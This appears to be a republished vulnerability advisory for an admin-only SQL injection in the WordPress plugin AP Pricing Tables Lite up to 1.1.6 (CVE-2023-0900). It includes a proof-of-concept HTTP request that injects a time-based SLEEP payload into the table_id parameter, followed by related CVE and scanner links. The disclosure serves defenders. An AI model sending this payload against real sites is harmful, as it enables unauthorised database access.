Lucene search
Simone Onofri, Donato OnofriWPVDB-ID:F601E637-A486-4F3A-9077-4F294ACE7EA1HistoryMay 10, 2023 - 12:00 a.m.
AP Pricing Tables Lite <= 1.1.6 - Admin+ SQLi
2023-05-1000:00:00
Simone Onofri, Donato Onofri
wpscan.com
4
wordpress
security
sql injection
admin
exploitable
0.012 Low
EPSS
Percentile
85.3%
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.
PoC
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 115 Accept: / Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://localhost/wp-admin/admin.php?page=ap-pricing-tables-lite Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [Admin+] Connection: close action=backend_ajax&_action=copy_table&table;_id=124+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce=
| CPE | Name | Operator | Version |
|---|---|---|---|
| ap-pricing-tables-lite | eq | * |
Related
wpexploit
wpexploit
AP Pricing Tables Lite <= 1.1.6 - Admin+ SQLi
2023-05-10 00:00:00
cvelist
cvelist
CVE-2023-0900 AP Pricing Tables Lite <= 1.1.6 - Admin+ SQLi
2023-06-05 13:39:01
nvd
nvd
CVE-2023-0900
2023-06-05 14:15:09
cve
cve
CVE-2023-0900
2023-06-05 14:15:09
prion
prion
Sql injection
2023-06-05 14:15:00
nuclei
nuclei
AP Pricing Tables Lite <= 1.1.6 - SQL Injection
2023-10-17 07:20:28
wordfence
wordfence